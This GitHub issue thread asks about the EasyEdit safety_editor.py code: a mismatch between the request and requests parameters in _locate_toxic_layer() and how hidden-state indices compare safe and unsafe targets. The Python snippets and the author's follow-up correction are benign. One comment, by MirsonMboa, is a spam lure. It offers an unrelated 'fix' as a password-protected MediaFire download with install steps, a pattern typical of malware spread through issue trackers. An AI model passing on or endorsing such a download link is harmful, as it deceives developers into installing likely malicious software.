### ISSUE TITLE
Confusions about safety_editor.py

### ISSUE THREAD

**Issue by LMRinGithub** [zjunlp/EasyEdit#354]
When I check _locate_toxic_layer(), I saw the input parameter for it called request, like this:
`self.hparams.layers = self._locate_toxic_layer(self.model, self.tok, [request,])`

While inside _locate_toxic_layer(), it called the parameter request**s**.
```
_locate_toxic_layer(self, model, tokenizer, requests, **kwargs)
input = tokenizer([value for pair in requests for value in [pair["target_new"], pair["ground_truth"]]],
                          return_tensors="pt", padding=True, truncation=True).to(f"cuda:{self.hparams.device}")
```
I believe it only passes one request to the _locate_toxic_layer function, isn't it? When I try the following code, it won't work

```
requests = [{
    'prompt': 'prompt111',
    'target_new': 'target_new_111',
    'ground_truth': 'ground_truth_111',
    'general_prompt': 'general_prompt_111',
    'locality': {}
},
    {
        'prompt': 'prompt222',
        'target_new': 'target_new_222',
        'ground_truth': 'ground_truth_222',
        'general_prompt': 'general_prompt_222',
        'locality': {}
    }
]
for i, (request) in enumerate(zip(requests)):
    param = [request, ]
    input = [value for pair in param for value in [pair["target_new"], pair["ground_truth"]]],
```

Also, how does the following line calculate the distance between safe and unsafe? Does the j*2 stand for target_new, and j*2 + 1 stand for ground_truth?
```
for j in range(len(requests)):
    euclidean_distance = torch.dist(
                        hidden_states[layer_index][j * 2],
                        hidden_states[layer_index][j * 2 + 1], p=2)
```

Thank you for reading this.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LMRinGithub** [comment]
> When I check _locate_toxic_layer(), I saw the input parameter for it called request, like this: `self.hparams.layers = self._locate_toxic_layer(self.model, self.tok, [request,])`
> 
> While inside _locate_toxic_layer(), it called the parameter request**s**.
> 
> ```
> _locate_toxic_layer(self, model, tokenizer, requests, **kwargs)
> input = tokenizer([value for pair in requests for value in [pair["target_new"], pair["ground_truth"]]],
>                           return_tensors="pt", padding=True, truncation=True).to(f"cuda:{self.hparams.device}")
> ```
> 
> I believe it only passes one request to the _locate_toxic_layer function, isn't it? When I try the following code, it won't work
> 
> ```
> requests = [{
>     'prompt': 'prompt111',
>     'target_new': 'target_new_111',
>     'ground_truth': 'ground_truth_111',
>     'general_prompt': 'general_prompt_111',
>     'locality': {}
> },
>     {
>         'prompt': 'prompt222',
>         'target_new': 'target_new_222',
>         'ground_truth': 'ground_truth_222',
>         'general_prompt': 'general_prompt_222',
>         'locality': {}
>     }
> ]
> for i, (request) in enumerate(zip(requests)):
>     param = [request, ]
>     input = [value for pair in param for value in [pair["target_new"], pair["ground_truth"]]],
> ```
> 
> Also, how does the following line calculate the distance between safe and unsafe? Does the j_2 stand for target_new, and j_2 + 1 stand for ground_truth?
> 
> ```
> for j in range(len(requests)):
>     euclidean_distance = torch.dist(
>                         hidden_states[layer_index][j * 2],
>                         hidden_states[layer_index][j * 2 + 1], p=2)
> ```
> 
> Thank you for reading this.

I made some mistakes, and some lines should be written as 
`for i, (request1, requests2) in enumerate(zip(requests,requests)):
    param = [request1, ]
    input = [value for pair in param for value in [pair["target_new"], pair["ground_truth"]]],`

Once have time, I will try debug and check the demensions of hiddenstate, so I will know if the code calculates the distance between safe and unsafe.
